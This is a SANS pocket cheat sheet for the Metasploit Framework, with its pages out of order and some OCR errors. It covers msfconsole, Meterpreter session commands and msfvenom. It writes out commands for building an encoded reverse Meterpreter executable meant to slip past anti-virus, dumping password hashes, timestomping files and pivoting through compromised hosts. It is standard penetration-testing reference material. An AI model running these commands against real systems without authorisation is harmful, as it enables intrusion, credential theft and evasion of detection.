Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter

meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session

```
msf > use post/windows/gather/hashdump
```

```
msf > show options
```

msf > set SESSION 1

msf > run

Useful Auxiliary Modules

Port Scanner:

```
msf > use
```

auxiliary/scanner/portscan/tcp

msf > set RHOSTS 10.10.10.0/24

msf > run

DNS Enumeration

```
msf > use auxiliary/gather/dns_enum
```

msf > set DOMAIN target.tgt

msf > run

FTP Server

msf > use auxiliary/server/ftp

msf > set FTPROOT /tmp/ftproot

msf > run

Proxy Server

msf > use auxiliary/server/socks4

msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.

Use proxychains configured for socks4 to route any applications traffic through a Meterpreter session.

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the now removed msfpayload and msfencode. Run with a "-I payloads' gives a list of payloads.

```
$ msfvenom -p [ExploitPath]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort] -f [FormatType]
Example
```

Reverse Meterpreter payload as an executable and redirected into a file:

\$ msfvenom -p

windows/meterpreter/reverse tcp

LHOST=10.1.1.1 LPORT=4444 -f exe > met.exe

Format Options (specified with -f)

--help-formats - Print out a summary of the specified options

exe - Executable

pl - Perl

rb - Ruby

raw - Raw shellcode

c - C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' gives a list of encoders.

\$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType (exe, perl, ruby, raw, c)] -i
[EncodeInterations] -o [OutputFilename]

<u>Example</u>

Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:

\$ msfvenom -p
windows/meterpreter/reverse_tcp -i 5 -e
x86/shikata ga nai -f exe -o mal.exe



Metasploit Cheat Sheet

By Ed Skoudis and Yori Kvitchko

POCKET REFERENCE GUIDE

http://www.sans.org

Purpose

The purpose of this cheat sheet is to describe some common options for some of the various components of the Metasploit Framework

Tools Described on This Sheet

Metasploit

The Metasploit Framework is a development platform for developing and using security tools and exploits.

Metasploit Meterpreter

The Meterpreter is a payload within the Metasploit Framework which provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

Metasploit msfvenom

The msfvenom tool is component of the Metasploit Framework which allows the user to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Perl script and raw shellcode. This payload can also be encoded to help avoid detection, thus encapsulating both msfpayload and msfencode functionality.

Metasploit Console Basics (msfconsole)

Search for module:

msf > search [regex]

Specify and exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current modules:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit

Metasploit Meterpreter

Base Commands:

? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type

shutdown / reboot: Self-explanatory

File System Commands:

cd: Change directory

lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory

1s: Show the contents of the directory

cat: Display the contents of a file on screen

download / upload: Move files to/from the target

machine

mkdir / rmdir: Make / remove directory

edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:

getpid: Display the process ID that Meterpreter is

running inside

getuid: Display the user ID that Meterpreter is

running with

ps: Display process list

kill: Terminate a process given its process ID
execute: Run a given program with the privileges

of the process the Meterpreter is loaded in

migrate: Jump to a given destination process ID

- Target process must have same or lesser privileges
- Target process may be a more stable process
- When inside a process, can access any files that process has a lock on

Network Commands:

ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table

Misc Commands:

idletime: Display the duration that the GUI of the

target machine has been idle uictl [enable/disable]

[keyboard/mouse]: Enable/disable either the

mouse or keyboard of the target machine

screenshot: Save as an image a screenshot of

the target machine

Additional Modules:

 ${\tt use} \ \ [{\tt module}]: Load \ the \ specified \ module$

Example:

 ${\tt use\ priv:}$ Load the priv module

hashdump: Dump the hashes from the box timestomp: Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:

```
msf > exploit -z
```

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

```
msf > exploit -j
```

List all current jobs (usually exploit listeners):

```
msf > jobs -1
```

Kill a job:

```
msf > jobs -k [JobID]
```

Multiple Sessions:

List all backgrounded sessions:

```
msf > sessions -1
```

Interact with a backgrounded sessions:

```
msf > session -i [SessionID]
```

Background the current interactive session:

```
meterpreter > <Ctrl+Z>
```

or

 ${\tt meterpreter} \; > \; {\tt background}$

Routing Through Sessions:

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.

msf > route add [Subnet to Route To]

```
[Subnet Netmask] [SessionID]
```